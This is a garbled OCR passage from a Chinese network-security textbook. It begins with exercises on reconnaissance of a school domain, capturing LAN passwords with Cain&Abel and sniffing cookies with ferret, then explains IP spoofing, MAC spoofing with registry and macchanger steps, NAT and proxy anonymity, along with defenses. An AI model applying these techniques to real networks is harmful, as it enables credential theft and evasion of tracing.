2-6 ”请 尝试 通过 百度 的 “高 级 搜索 ”功能 ,指定 某 个 关键 词 ,收集 学 校 所 在 域名 的 详 
细 信 息 。 

2-7 请 分 别 尝试 使 用 theharvester 工具 和 “search_email_collector” 模 块 收集 学 校 所 
在 域名 的 邮件 地 址 。 

2-8 ”请 分 别 使 用 theharvester 和 fierce 工具 收集 学 校 所 在 域名 和 IP 地 址 信息 ,比较 
两 者 收集 到 的 信息 差别 。 

2-9 在 Maltego 上 注册 一 个 账号 ,输入 自己 名 字 或 邮件 地 址 , 试 试看 能 收集 到 哪些 
有 关 自 己 的 信息 。 

2-10 应 用 Zenmap 或 Neotrace, 结 合 theharvester 工具 分 析 某 个 域名 的 结果 ,绘制 
从 自身 位 置 到 目标 域 中 各 台 主 机 的 网 络 拓扑 图 。 

2-11 练习 应 用 Cain&Abel 在 局 域 网 中 截获 各 种 账户 和 口令 。 

2-12 练习 应 用 p0f 监听 网 络 中 各 台 主 机 的 IP、 域 名 及 OS 类 型 。 

2-13 ”练习 应 用 ferret 监听 网 络 中 各 台 主 机 访问 HTTP 时 的 Cookie 信息 。 


女生 3 音 


网 络 隐身 


学 习 要 求 : 

。 理解 IP 地 址 欺骗 技术 的 基本 原理 。 

。 掌握 MAC 地 址 欺骗 技术 的 基本 原理 ,掌握 相应 系统 配置 方法 和 工具 使 用 方法 。 
。 掌握 各 种 网 络 地 址 转换 技术 的 基本 原理 。 

。 掌握 代理 隐藏 技术 的 基本 原理 ,熟悉 各 种 代理 工具 的 使 用 方法 。 

。 了解 网 络 隐 身 的 其 他 方法 。 


IP 地 址 是 计算 机 网 络 中 任何 联网 设备 的 身份 标识 ,MAC 地 址 是 以 太 网 终端 设备 的 
链 路 层 标识 ,所 谓 网 络 隐身 就 是 使 得 目标 不 知道 与 其 通信 的 设备 的 真实 IP 地 址 或 MAC 
地 址 , 当 安全 管理 员 检 查 攻击 者 实施 攻击 留 下 的 各 种 痕迹 时 ,由 于 标识 攻击 者 身份 的 IP 
或 MAC 地 址 是 冒充 的 或 者 不 真实 的 ,管理 员 无 法 确认 或 者 需要 花费 大 量 精 力 去 追踪 该 
攻击 的 实际 发 起 者 。 因 此 ,网 络 隐身 技术 可 以 较 好 地 保护 攻击 者 ,避免 其 被 安全 人 员 过 早 
发 现 。 常 用 的 网 络 隐身 技术 主要 包括 IP 地 址 欺骗 (或 IP 盗用 )、MAC 地 址 欺骗 (或 MAC 
盗用 ) 、 网 络 地 址 转换 、 代 理 隐藏 账户 次 用 和 僵尸 主机 等 技术 。 


3.1 IP 地 址 欺骗 


因为 TCP/IP 协议 路 由 机 制 只 检查 报 文 目标 地 址 的 有 效 性 ,所 以 攻击 者 可 以 定制 虚 

假 的 源 IP 地 址 ,有 效 避 免 安全 管理 员 的 IP 地 址 追踪 。 另 外 ,目标 的 访问 控制 组 件 可 能 使 
用 IP 地 址 列表 的 方式 来 设置 允许 或 禁止 对 网 络 服务 的 访问 ,攻击 者 可 以 盗用 其 他 IP 地 
址 ,从 而 绕 过 访问 控制 的 设置 ,对 目标 服务 实施 攻击 。 
IP 欺骗 (IP Spoofing) 就 是 利用 主机 间 的 正常 信任 关系 ,通过 修改 IP 报 文 中 的 源 地 
址 ,以 绕 开 主 机 或 网 络 访问 控制 ,隐藏 攻击 者 的 攻击 技术 。IP 地 址 欺骗 的 示意 图 如 图 3-1 
所 示 ,在 网 络 中 假设 有 三 台 主 机 A、.B、C, 其 中 A 和 B 可 以 直接 通信 (或 者 相互 信任 且 无 
须 认 证 ) ,攻击 者 C 冒充 主机 A 实现 与 主机 B 通信 ,A 可 能 在 线 也 可 能 不 在 线 。 

当 C 与 A 在 同一 个 局 域 网 内 ,实施 IP 欺骗 相对 容易 ,因为 攻击 者 可 以 观察 B 返 回 的 
报 文 ,根据 有 关 信 息 成 功 伪 造 A 发 出 的 报 文 。 当 C 和 A 分 属 不 同 网 络 时 ,如 果 冒 充 A 与 
B 进行 UDP 通信 ,C 只 需要 简单 修改 发 出 的 IP 报 文 的 源 IP 地 址 即 可 。 但 是 如 果 A 与 BB 
建立 TCP 连接 进行 通信 ,C 实施 IP 欺骗 就 非常 困难 ,因为 C 无 法 获得 响应 报 文 ,因此 无 
法 得 知 该 连接 的 初始 序列 号 ,而 TCP 通信 和 是 基于 报 文 序 号 的 可 靠 传输 ,所 以 C 伪造 的 
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A 被 假冒 的 主机 ， 
可 能 不 在 线 


B 的 响应 报 文 
B 目 标 主 机 


| 
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发 送 源 地 址 为 A 的 报 文 
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图 3-1 IP 欺骗 示意 图 


TCP 报 文 很 大 概率 被 拒绝 ,攻击 欺骗 成 功 的 概率 较 低 。 
一 次 成 功 的 IP 欺骗 通常 需要 三 个 步骤 ( 见 图 3-2)。 









A 被 假冒 的 主机 ， 
可 能 不 在 线 


对 A 进 行 攻击 ， 使 A 


B 发 送 第 二 路 握手 报 文 ， 
掉 线 或 者 无 法 接收 报 文 发 送 第 二 路 据 手 报 广 


但 是 A 无 法 接收 


B 目标 主机 












对 B 的 ISN 进 行 采样 和 猜测 

C 冒 充 A 发 起 连接 请 求 ， 即 第 一 路 握手 报 文 全 

C 冒 充 A 发 出 连接 确认 ， 即 第 三 路 握手 报 文 ， 确 认 号 为 猜测 的 ISN+1 
连接 建立 ，C 冒 充 A 与 B 进 行 通信 


一 


图 3-2 IP 欺骗 实现 过 程 

















1. 使 A 停止 工作 

由 于 C 要 假冒 A,C 必须 保证 A 无 法 收 到 任何 有 效 的 TCP 报 文 , 否 则 A 会 发 送 RST 
标记 的 报 文 给 B, 从 而 使 得 TCP 连接 被 关闭 。 可 以 通过 拒绝 服务 攻击 、 社 会 工程 学 或 中 
间 人 攻击 等 方法 使 得 A 停止 工作 。 

2. 猜测 初始 序列 号 

C 必须 知道 B 与 A 建立 连接 时 的 TCP 报 文 的 初始 序列 号 (ISN) , 即 第 二 路 握手 报 文 
中 的 SEQ 字段 值 。C 只 有 在 第 三 路 握手 报 文中 将 确认 号 设置 为 ISN 十 1, 才 能 通过 B 的 
验证 ,成 功 建立 连接 。 在 无 法 截获 第 二 路 握手 报 文 时 ,如 何 正 确 猜测 ISN 值 是 欺骗 成 功 
与 否 的 关键 。 

TCP 的 ISN 使 用 32 位 计数 器 ,通常 难以 猿 中 ,但 是 由 于 某 些 操作 系统 协议 栈 实现 
时 ,ISN 的 选择 存在 一 定 规律 ,有 的 基于 时 间 , 有 的 随机 增加 ,还 有 的 固定 不 变 , 因 此 可 以 
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预先 对 某 个 端口 进行 多 次 连接 ,采样 其 ISN 基 值 和 变化 规律 ,作为 猜测 未 来 连接 的 ISN 
的 参考 信息 。 当 采集 的 信息 足够 对 ISN 进行 预测 时 , 即 可 开始 建立 假冒 连接 。 当 C 发 送 
的 报 文 在 到 达 B 时 ,根据 猜测 ISN 的 不 同 结果 ,B 有 以 下 四 种 处 理 方式 : 

(1) ISN 正确 ,C 的 报 文 被 B 成 功 接收 。 

(2) ISN 小 于 B 期 望 的 数字 ,B 丢弃 该 报 文 。 

(3) ISN 大 于 B 期 望 的 数字 , 且 在 B 的 滑动 窗口 内 ,B 认为 这 是 乱 序 到 达 的 报 文 ,将 
报 文 放 入 缓冲 区 中 并 等 待 其 他 报 文 。 

(4) ISN 大 于 B 期 望 的 数字 , 且 超 出 B 的 滑动 窗口 ,B 将 丢弃 该 报 文 并 重 发 确认 报 文 





给 并。 
3. 建立 欺骗 连接 
IP 欺骗 之 所 以 能 够 实施 是 因为 通信 主机 之 间 仅 凭 IP 地 址 标识 对 方 身份 ,并 且 攻 击 
者 可 以 正确 猜测 TCP 连接 的 初始 序列 号 (ISN)。 

对 于 IP 欺骗 可 采取 的 防范 措施 包括 : 

(1) 使 用 基于 加 密 的 协议 如 IPSec 或 SSH 进行 通信 ,通信 时 使 用 口令 或 证 书 进行 身 
份 验证 。 

(2) 使 用 随机 化 的 ISN, 攻 击 者 无 法 猜测 正常 连接 的 序列 号 。 

(3) 在 路 由 器 上 配置 包 过 滤 策 略 , 检 测报 文 的 源 IP 地 址 是 否 属于 网 络 内 部 地 址 ,如 
果 来 自 外 部 网 络 的 报 文 的 源 IP 地 址 属于 内 部 网 络 ,那么 该 报 文 肯定 是 伪造 的 。 

(4) 不 要 使 用 基于 IP 地 址 的 信任 机 制 。 


3.2 MAC 地 址 欺骗 


MAC 地 址 欺骗 (或 MAC 盗用 , MAC Spoofing) 通 常用 于 突破 基于 MAC 地 址 的 局 域 

网 访问 控制 (图 3-3) ,例如 在 交换 机 上 限定 只 转发 源 MAC 地 址 在 预定 义 的 访问 列表 中 的 

报 文 ,其 他 报 文 一 律 拒绝 。 攻 击 者 只 需要 将 自身 主机 的 MAC 地 址 修改 为 某 个 存在 于 访 

问 列表 中 的 MAC 地 址 即 可 突破 该 访问 限制 ,而 且 这 种 修改 是 动态 的 并 且 容 易 恢复 。 还 

有 的 访问 控制 方法 将 IP 地 址 和 MAC 进行 绑 定 ,目的 是 使 得 一 个 交换 机 端口 只 能 提供 给 

位 付费 用 户 的 一 台 主 机 使 用 ,此 时 攻击 者 需要 同时 修改 自己 的 IP 地 址 和 MAC 地 址 去 
突破 这 种 限制 。 





















.一面 于 B 的 MAC 不 在 访问 
列表 中 ，B 发 出 的 报 广 


弃 





允许 的 MAC 列 表 
FF:FF:AE:00:01:02 
FF:FF:AE:00:04:02 
FF:FF:AE:00:01:02 FF:FF:AE:00:01:0E FF:FF:AE:00:02:02 


图 3-3 基于 MAC 地 址 的 访问 控制 
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在 不 同 的 操作 系统 中 修改 MAC 地 址 有 不 同 的 方法 ,其 实质 都 是 网 卡 驱动 程序 从 系 
统 中 读 取 地 址 信息 并 写 入 网 卡 的 硬件 存储 器 ,而 不 是 实际 修改 网 卡 硬件 ROM 中 存储 的 
原 有 地 址 , 即 所 谓 的 “ 软 修改 ”, 因 此 攻击 者 可 以 为 了 实施 攻击 临时 修改 主机 的 MAC 地 
址 ,事后 很 容易 恢复 为 原来 的 MAC 地址。 

在 Windows 中 ,几乎 所 有 的 网 卡 驱动 程序 都 可 以 从 注册 表 中 读 取 用 户 指定 的 MAC 
地 址 , 当 驱 动 程序 确定 这 个 MAC 地 址 有 效 时 ,就 会 将 其 编程 写 入 网 卡 的 硬件 寄存 器 中 ， 
而 忽略 网 卡 原来 的 MAC 地址。 以 下 以 Windows 7 SP1 家 用 版 为 例 , 说 明 Windows 系统 
中 修改 MAC 地 址 的 两 种 方法 。 一 种 方法 是 直接 在 网 卡 的 “配置 高 级 一 网 络 地 址 ?菜单 
项 中 修改 ?( 图 3-4) ,系统 会 自动 重启 网 卡 ,修改 后 可 以 在 控制 台 窗 口中 键入 "ipconfig / 
all” 命 令 检查 网 卡 地 址 是 否 已 成 功 更 改 , 如 果 选 择 “ 不 存在 ” 则 恢复 为 原 有 MAC 地 址 。 该 
方法 针对 有 线 网 卡 有 效 ,但 是 无 线 网 卡 默 认 没有 “网 络 地 址 ”, 无 法 使 用 这 种 方法 修改 。 
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(a) (b) 
图 3-4 网 卡 属性 中 修改 网 络 地 址 


另 一 种 方法 是 直接 修改 注册 表 , 生 成 与 第 一 种 方法 相同 的 针对 无 线 网 卡 的 “网 络 地 
址 ”设置 。 运 行 注册 表 编 辑 器 (regedit. exe) ,在 “\HKEY_LOCALMACHINE\SYSTEM\ 
ControlSet001\Control\Class” 键 下 搜索 网 卡 的 描述 信息 ,定位 网 卡 配 置 选 项 在 注册 表 中 
的 位 置 ,本 例 中 无 线 网 卡 的 对 应 配置 选项 在 注册 表 项 “[HKEY_LOCAL_MACHINE\ 
SYSTEM\ ControlSet001 \ Control \ Class \ { 4D36E972-E325-11CE-BFC1-08002BE10318 } \ 
0015” 内 (图 3-5)。 然 后 在 “Ndi\params” 子 项 下 新 建 子 项 “NetworkAddress”, 并 新 增 如 
图 3-6 所 示 的 所 有 键 值 , 即 可 在 无 线 网 络 连 接 的 配置 选项 中 生成 “网 络 地 址 ”菜单 项 ,并 可 
自由 修改 MAC 地 址 。 当 地 址 修改 成 功 后 ,注册 表 会 自动 在 上 述 表 项 ( 即 0015 项 ) 中 增加 
一 个 “NetworkAddress” 的 键 值 (图 3-7)。 也 可 以 将 以 下 文本 导入 注册 表 ( 保 存 为 . reg 后 
缀 的 文件 名 ) ,产生 与 图 3-6 相同 的 效果 : 


@ 修改 网 卡 地 址 时 需要 注意 前 三 个 字 节 表示 网 卡 厂 商 ,如 果 修 改 后 的 网 卡 地 址 不 属于 该 厂商 ,修改 后 的 地 址 可 
能 会 无 效 。 系 统 只 会 设置 有 效 的 地 址 ,所 以 必须 检查 修改 后 的 地 址 是 否 生 效 。 
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[HEEY_ LOCAL_ MACHINE \ SYSTEM \ ControlSet001 \ Control \ Class \ { 4D36E972-E325-11CE-BFC1- 
08002BE10318}\0015\Ndi\params\NetworkAddress] 

"default" = "000000000000" 

"Optional" = "1" 

"ParamDesc" = "网 络 地 址 " 

"type" = "edit" 

"UpperCase" = "1" 

"LimitText" = "12" 
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图 3-6 新 增 NetworkAddress 项 及 键 值 前 后 的 网 卡 连接 菜单 项 对 比 


| | 中 ‘ulNetiype Keb SL wian 


| .和 ws 
| | TE Aootcst REG SZ 700000AABBCC 


图 3-7 修改 后 的 MAC 地 址 在 注册 表 中 的 存放 位 置 


在 Linux 系统 下 修改 MAC 地 址 十 分 方便 ,只 要 网 卡 的 驱动 程序 支持 修改 网 卡 的 物 
理 地 址 , 即 可 应 用 三 条 “ifconfig”* 命 令 完成 地 址 修改 任务 : 禁用 网 卡 ; 四 设置 网 卡 的 
MAC 地 址 ; 图 启用 网 卡 。 如 图 3-8 所 示 ,eth0 是 网 卡 名 ,ether 表示 是 以 太 网 类 型 的 网 
卡 ,“0000aabbccff” 是 随机 设置 的 一 个 地 址 ,使 用 “ifconfig eth0” 即 可 查看 地 址 修改 是 否 已 
经 生效 。 不 过 使 用 该 方法 有 一 点 不 方便 , 即 用 户 需要 自行 保存 原 有 的 MAC 地 址 ,然后 再 
用 相同 的 方法 恢复 。 

笔者 推荐 使 用 经 典 地 址 修改 工具 macchanger( 图 3-9) 完 成 Linux 下 的 MAC 地 址 修 
改 , 它 不 需要 用 户 保存 原 有 地 址 即 可 自动 恢复 。macchanger 不 但 可 以 修改 为 与 原 有 
MAC 地 址 为 同一 个 厂家 的 随机 MAC 地 址 、 修 改 为 不 同 厂 家 但 是 与 原 有 地 址 属于 同一 类 
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型 的 随机 MAC 地 址 、 修 改 为 不 同 三 家 不 同类 型 的 随机 MAC 地 址 或 修改 为 完全 随机 的 
MAC 地 址 ,而 且 还 支持 查询 各 知名 厂家 的 MAC 地 址 段 。 





图 3-8 ifconfig 命令 修改 MAC 





图 3-9 macchanger 工具 修改 MAC 地 址 


3.3 网 络 地 址 转换 


网 络 地 址 转换 (Network Address Translation, NAT) 是 一 种 将 私有 地 址 转换 为 公有 
IP 地 址 的 技术 ,对 终端 用 户 透明 ,被 广泛 应 用 于 各 类 Internet 接 入 方式 和 各 类 网 络 中 。 
NAT 不 仅 解 决 了 IP 地 址 不 足 问题 ,而 且 还 能 有 效 避 免 来 自 网 络 外 部 的 攻击 ,同时 它 可 以 
对 外 隐藏 网 络 内 部 主机 的 实际 IP 地 址 。 攻 击 者 使 用 NAT 技术 时 ,管理 员 只 能 查看 到 经 
过 转换 后 的 IP 地址 ,无 法 追查 攻击 者 的 实际 IP 地 址 ,除非 他 向 NAT 服务 器 的 拥有 者 请 
求 帮助 ,而 且 NAT 服务 器 实时 记录 并 存储 了 所 有 的 地 址 转换 记录 。 在 同一 时 刻 ,可 能 有 
很 多 内 网 主机 共用 一 个 公有 全 地 址 对 外 访问 ,所 以 攻击 者 可 以 将 自己 隐藏 在 这 些 人 P 地 址 
中 ,减少 被 发 现 的 可 能 性 。NAT 有 三 种 实现 方式 , 即 静 态 转换 ,动态 转换 和 端口 地 址 转换 。 

静态 转换 指 将 内 网 的 私有 IP 地 址 转换 为 公有 IP 地 址 ,转换 方式 是 一 对 一 且 固 定 不 
变 , 一 个 私有 IP 地 址 只 能 固定 转换 为 一 个 公有 IP 地 址 。 使 用 静态 转换 可 以 实现 外 网 对 
内 网 的 某 些 特定 设备 或 服务 的 访问 。 

动态 转换 指 将 内 网 的 私有 IP 地 址 转换 为 公用 IP 地 址 时 ,有 多 种 选择 ,NAT 会 从 公 

IP 地 址 池 中 随机 选择 一 个 。 只 要 分 别 指定 可 转换 的 内 部 地 址 集合 和 合法 的 外 部 地 址 
时 合 ,就 可 以 进行 动态 转换 , 它 可 以 适用 于 没有 传输 层 的 IP 报 文 。 














由 汪 
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端口 地 址 转换 (Port Address Translation,PAT) 指 既 改 变 外 部 报 文 的 IP 地 址 ,也 改 
变 报 文 的 端口 。 内 网 的 所 有 主机 均 可 共享 一 个 合法 外 部 IP 地 址 实现 对 外 访问 ,从 而 可 以 
最 大 限度 地 节约 IP 地 址 资源 ,同时 又 可 隐藏 网 络 内 部 的 所 有 主机 ,有 效 避 免 来 自 外 部 的 
攻击 。 由 于 是 对 端口 进行 转换 ,所 以 只 能 适用 于 基于 UDP/TCP 协议 的 网 络 通信 。 

NAT 服务 器 中 有 一 张 地址 转换 表 , 其 中 每 一 项 与 一 个 通信 过 程 绑 定 , 每 个 表 项 称 为 
会 话 。 当 内 网 主机 的 第 一 个 报 文 发 给 外 网 时 ,会 话 即 被 建立 ,此 后 该 会 话 的 所 有 报 文 都 采 
用 相同 的 地 址 转换 过 程 ,也 就 是 说 ,属于 同一 会 话 的 报 文 ,转换 后 的 源 IP 地 址 和 端口 号 必 
须 相同 。 当 通信 结束 时 ,NAT 将 该 会 话 从 地 址 转换 表 中 删除 。NAT 的 地 址 转换 表 与 操 
作 系 统 的 TCP/IP 协议 栈 没有 关联 ,只 限于 转换 IP 报 文 的 源 或 目标 IP 地 址 。 

静态 NAT 的 地 址 转换 表 项 在 配置 后 即 固 定 不 变 ; 动态 NAT 的 表 项 在 每 次 会 话 新 
建立 后 保持 不 变 ,它们 记录 原始 IP 地 址 和 替换 IP 地 址 的 映射 关系 ; 而 PAT 的 表 项 包括 
原始 IP 地 址 、 原始 端 口 、 替 换 IP 地 址 和 替换 端口 四 部 分 内 容 。 

图 3-10 给 出 了 一 个 动态 地 址 转换 示例 ,内 网 IP 地 址 "192. 168. 1.2” 在 NAT 出 口 被 
转换 为 IP 地 址 “192. 168. 2. 100”, 端 口号 没有 变化 ,该 转换 表 项 的 映射 关系 在 会 话 存 续 期 
间 不 会 改变 。 图 3-11 给 出 的 PAT 示例 说 明了 端口 和 IP 地址 同时 被 PAT 转换 ,如 “192. 
168. 1.2:5001” 被 转换 为 “192. 168. 2. 100:8210”。 静 态 NAT 的 映射 关系 与 图 3-10 相同 ， 
但 是 静态 NAT 表 项 必须 预先 静态 配置 , 当 外 部 主机 希望 访问 内 网 某 台 主机 时 ,只 需要 访 
问 在 转换 表 中 映射 的 外 部 IP 地 址 即 可 。 也 就 是 说 ,静态 NAT 只 在 外 部 主机 发 起 通信 
时 , 才 会 绑 定 会 话 和 相应 的 转换 表 项 ; 而 动态 NAT 和 PAT 只 有 当 内 部 网 络 主机 发 起 会 
话 时 , 才 会 绑 定 对 应 的 转换 表 项 。 
原始 报 广 替换 报 文 

192.168.1.2:6001--->192.168.2.2:25 一 | 192.168.2.100:6001--->192.168.2.2:25 




































































192.168.1.2:5001--->192.168.2.2:80 六 一 一。 192.168.2.100:5001--->192.168.2.2:80 
192.168.2.2 
192.168.2.100 
192.168.2.101 
地 址 转换 表 
192.168.1.2 192.1681.3 源 IP 地 址 ”替换 的 源 IP 
0 192.168.1.2 192.168.2.100| 
192.168.2.2:25--->192.168.1.2:6000 | 一 | 192.168.2.2:25--->192.168.2.100:6001 
192.168.2.2:80--->192.168.1.2:5001 一 ] 192.168.2.2:80--->192.168.2.100:5001 

















替换 响应 报 文 原始 响应 报 文 
3-10 动态 地 址 转换 示例 


对 于 NAT 转换 ,必须 注意 它 对 于 终端 用 户 是 透明 的 , 即 用 户 感觉 不 到 NAT 的 存在 。 
例如 对 于 图 3-11 的 示例 ,如 果 在 “192. 168. 1.2” 上 使 用 “netstat -an 命令 检查 其 活动 网 络 
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连接 或 使 用 嗅 探 工具 监听 其 收发 的 报 文 ,无 法 发 现任 何 与 IP 地 址 “192. 168. 2. 100” 有 关 
的 报 文 。 同 样 ,在 服务 器 “192. 168. 2. 2” 上 ,只 能 观察 到 自身 与 转换 后 的 IP 地 址 
“192. 168. 2. 100? 建 立 网 络 连接 并 进行 通信 ,与 原始 IP“192. 168. 1. 2” 无 关 。 而 在 NAT 
服务 器 上 ,并 没有 建立 与 “192. 168. 1. 2” 或 “192. 168. 2. 2” 的 任何 网 络 连 接 , 仅 仅 维护 一 张 
网 络 地 址 转换 表 , 用 于 转换 和 转发 报 文 , 所 以 使 用 “netstat -an” 命 令 看 不 到 任何 活动 网 络 
连接 。 

原始 报 文 替换 报 文 
192.168.1.2:5001--->192.168.2.2:80 ”=| 192.168.2.100:8210--->192.168.2.2:80 


192.168.2.2 
192.168.2.100 
































192.168.2.101 
地 址 转换 表 
192.168.1.2 192.168.1.3 | 原始 地 址 ”原始 端口 ”替换 地 址 ”替换 端口 
192.168.1.2 5001 192.168.2.100 8210 

















192.168.2.2:80--->192.168.1.2:5001 
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图 3-11 端口 地 址 转换 示例 


3.4 代理 隐藏 


代理 隐藏 指 攻 击 者 不 直接 与 目标 主机 进行 通信 ,而 是 通过 代理 主机 (或 跳板 主机 ) 间 
接地 与 目标 主机 通信 ,所 在 在 目标 主机 的 日 志 中 只 会 留 下 代理 的 IP 地 址 ,而 无 法 看 到 攻 
击 者 的 实际 IP 地 址 。 但 是 管理 员 可 以 进行 IP 回溯 , 即 访问 代理 主机 去 进一步 追踪 。 许 
多 防御 工具 如 防火 墙 或 人 侵 防 御 系 统 就 提供 追溯 功能 ,可 以 反 向 查询 代理 跳板 主机 以 追 
踪 到 真实 IP 地 址 。 但 是 这 种 功能 通常 有 追溯 层 数 的 限制 ,一 旦 代理 的 层 数 超过 追溯 层 数 
的 设置 时 ,管理 员 依然 无 法 发 现 地 址 。 所 以 攻击 者 通常 使 用 多 个 代理 主机 以 构成 多 层次 
的 代理 网 络 ,而 防御 工具 也 应 该 设置 更 高 的 追溯 层 数 来 追踪 攻击 者 。 

代理 主机 的 原理 是 将 源 主机 与 目标 主机 的 直接 通信 分 解 为 两 个 间接 通信 进程 ,一 个 
进程 为 代理 主机 与 目标 主机 的 通信 进程 , 另 一 个 为 源 主机 与 代理 主机 的 通信 进程 。 代 理 
主机 可 以 将 内 网 与 外 网 隔离 , 即 外 网 只 能 看 到 代理 主机 ,无 法 看 到 内 网 其 他 任何 主机 ,在 
代理 主机 上 可 以 施加 不 同 的 安全 策略 ,过 滤 非 法 访问 并 进行 监控 等 。 

在 互联 网 中 有 很 多 运行 代理 服务 的 主机 并 没有 得 到 很 好 的 维护 ,它们 因为 没有 及 时 
打上 安全 补丁 或 者 没有 实施 访问 控制 ,已 经 被 非法 控制 或 者 可 以 被 随意 使 用 , 称 为 "网络 
跳板 ”或 者 “免费 代理 ”, 攻 击 者 通常 利用 这 些 免 费 代 理 进行 隐身 。 

按照 代理 服务 的 对 象 不 同 , 可 分 为 正 向 代理 和 反 向 代理 两 种 。 通 常 所 说 的 代理 默认 
是 正 向 代理 (图 3-12) ,客户 主机 访问 目标 服务 器 时 ,必须 向 代理 主机 发 送 请 求 ( 该 请 求 中 
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指定 了 目标 主机 ) ,然后 代理 主机 向 目标 主机 转发 请 求 并 获得 应 答 ,将 应 答 转 发 给 客户 主 
机 ,客户 主机 必须 知道 代理 主机 的 IP 地 址 和 运行 代理 服务 的 端口 号 。 反 向 代理 (图 3-13) 
为 目标 服务 器 提供 服务 ,相当 于 实际 服务 器 的 前 端 ,通常 用 于 保护 和 隐藏 真正 的 目标 服务 
器 。 与 正 向 代理 不 同 ,客户 主机 无 须 做 任何 设置 也 不 知道 代理 主机 的 存在 , 它 直 接 向 代理 
主机 提供 的 服务 发 起 请 求 , 代 理 主机 根据 预定 义 的 映射 关系 判定 将 向 哪个 目标 服务 器 转 
发 请 求 , 然 后 将 收 到 的 应 答 转发 给 客户 主机 。 


Www.jxnu.edu.cn 







客户 主机 访问 


http://www.jxnu.edu.cn 


图 3-12 正 向 代理 示意 图 


反 向 代理 Www,jxnu.edu.cn 
客户 主机 访问 Www1jxnu.edu.cn 
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反 向 代理 2 


www2.jxnu.edu.cn 


3-13 ” 反 向 代理 示意 图 


如 果 正 向 代理 不 需要 配置 代理 主机 的 IP 地 址 和 端口 , 则 称 为 透明 代理 ( 见 图 3-14) 。 
即 用户 无 须 任何 设置 ,只 要 向 目标 服务 器 发 起 的 请 求 经 过 了 代理 主机 (透明 代理 通常 放置 
在 网 关 的 位 置 ) ,代理 主机 就 会 自动 建立 与 服务 器 的 连接 并 转发 客户 请 求 和 接收 应 答 , 然 
后 再 转发 给 客户 。 与 NAT 不 同 , 代 理 主机 工作 在 传输 层 或 应 用 层 , 无 论 是 否 是 透明 代 
理 , 它 都 会 分 别 与 客户 和 服务 器 建立 TCP 连接 或 UDP 套 接 字 进行 通信 。 


www.jxnu.edu.cn 







客户 主机 访问 


http://wwwjxnu.edu.cn 


客户 不 知道 是 否 与 
代理 建立 了 连接 


3-14 ”透明 代理 示意 图 
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常见 代理 按 用 途 分 类 ,可 分 为 : 

(1) HTTP 代理 : 主要 作用 是 代理 浏览 器 访问 Web 服务 器 ,端口 一 般 为 80、8080、 
3128 等 。 

(2) SSL 代理 : 代理 访问 https:// 开 头 的 Web 网 站 ,SSL 的 标准 端口 为 443 。 

(3) HTTP CONNECT 代理 : 用 户 向 代理 发 起 HTTP CONNECT 请 求 ,代理 主机 
为 用 户 建立 TCP 连接 到 目标 服务 器 的 任何 端口 ,不仅 可 用 于 HTTP, 还 包括 FTP、IRC、 
RM 流 服 务 等 。 

(4) HTTP TUNNEL 代理 : 与 HTTP CONNECT 代理 类 似 , 但 是 转发 隧道 报 文 , 通 
常 是 加 密 的 SSL 通信 ,可 以 代理 任何 基于 TCP 的 保密 通信 。 

(5) FTP 代理 : 代理 FTP 客户 机 软件 访问 FTP 服务 器 ,其 端口 一 般 为 21 .2121。 

(6) POP3 代理 : 代理 邮件 客户 机 软件 用 POP3 协议 接收 邮件 ,其 端口 一 般 为 110。 

(7) Telnet 代理 : 代理 Telnet 客户 程序 访问 Telnet 服务 器 ,用 于 远程 控制 和 管理 ， 
其 端口 一 般 为 23。 

(8) Socks 代理 : 传输 层 套 接 字 代 理 , 有 Socks 4 和 Socks 5 两 个 版 本 ,Socks 4 只 支 
持 TCP 协议 而 Socks 5 同时 支持 TCP/UDP 协议 , 它 支持 所 有 应 用 层 协议 以 及 各 种 身份 
验证 协议 等 ,其 标准 端口 为 1080 。 

按 请 求 信息 的 安全 性 划分 ,可 以 分 为 非 匿 名 代理 和 匿名 代理 。 通 常 默认 的 代理 服务 
是 非 匿名 代理 , 即 远 端 服务 器 可 以 根据 代理 主机 发 出 的 请 求 报 文中 的 信息 ,识别 客户 主机 
的 真实 IP 地 址 ,而 匿名 代理 则 会 隐藏 真实 的 客户 主机 地 址 。 以 HTTP 代理 为 例 , 有 三 个 
HTTP 请 求 字段 与 代理 主机 和 客户 主机 IP 地 址 有 关 ,“REMOTE_ADDR” 表 示 这 个 
HTTP 请 求 的 发 起 者 的 地 址 ,“HTTP_VIA” 表 示 这 个 请 求 经 过 哪 几 个 代理 ,“HTTP_X_ 
FORWARDED_FOR” 表 示 这 个 请 求 是 代理 了 哪个 IP 地 址 的 请 求 , 表 3-1 列 出 了 各 种 可 
能 的 配置 情况 。 高 匿名 代理 隐藏 最 好 ,服务 器 无 法 知道 是 否 是 代理 在 发 出 请 求 , 其 他 三 种 
情况 服务 器 都 可 以 识别 是 代理 发 出 的 请 求 ,区 别 只 是 服务 器 是 否 知道 真实 的 客户 人 地 址 。 

表 3-1 各 种 代理 的 匿名 配置 
匿名 配置 REMOTE_ADDR HTTP_VIA HTTP_X_FORWARDED_FOR| 匿名 效果 














| 代理 主机 的 IP 地 址 | 代理 主机 的 IP 地 址 | 真实 客户 主机 IP 地 址 Te 
代理 户 IP 
无 法 识别 
匿名 代理 ”| 代理 主机 的 IP 地 址 | 代理 主机 的 IP 地 址 | 代理 主机 的 IP 地 址 客户 也 
混淆 代理 | 代理 主机 的 IP 地 址 | 代理 主机 的 IP 地 址 | 伪造 的 了 P 地 址 和 
户 IP 地 址 
无 法 识别 
高 匿名 代理 | 代理 主机 的 IP 地 址 | 无 无 代理 请 求 

















代理 软件 主要 有 以 下 7 类 。 

(1) Burpsuite: 一 款 用 Java 语言 编写 的 用 于 Web 攻击 的 集成 平台 ,包括 一 个 HTTP 
和 HTTPS 代理 服务 器 ,可 以 拦截 ,修改 和 查看 客户 机 与 Web 服务 器 之 间 的 所 有 报 文 ,但 
是 仅 支 持 透 明代 理 和 正 向 代理 功能 (图 3-15) 。 
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Proxy Listeners 


加 Burp proxy uses listeners to receive incoming HTTP requests from your browser You will need to configure your browse 
server 















These settings control whether Burp redirects requests received by this listener. 
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Invisible proxy support allows non-proxy-aware clients to connect directly to the listener. 
Intercept Clie' 


@ ee these seting Support invisible proxying (enable only if needed) 支持 透明 代理 





图 3-15 Burpsuite 代理 设置 


(2) OWASP Zap: OWASP 组 织 开 发 的 一 款 免费 Web 安全 扫描 器 ,与 Burpsuite 类 
似 , 也 集成 了 一 个 HTTP 和 HTTPS 的 代理 服务 器 ,简单 易 用 , 仅 支 持 正 向 代理 功能 
(图 3-16) 。 
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3-16 ”ZAP 代理 设置 


(3) Subgraph Vega: Subgraph 公司 出 品 的 免费 Web 安全 扫描 器 ,主要 集成 了 Socks 
和 HTTP 代理 , 仅 支持 正 向 代理 功能 。 
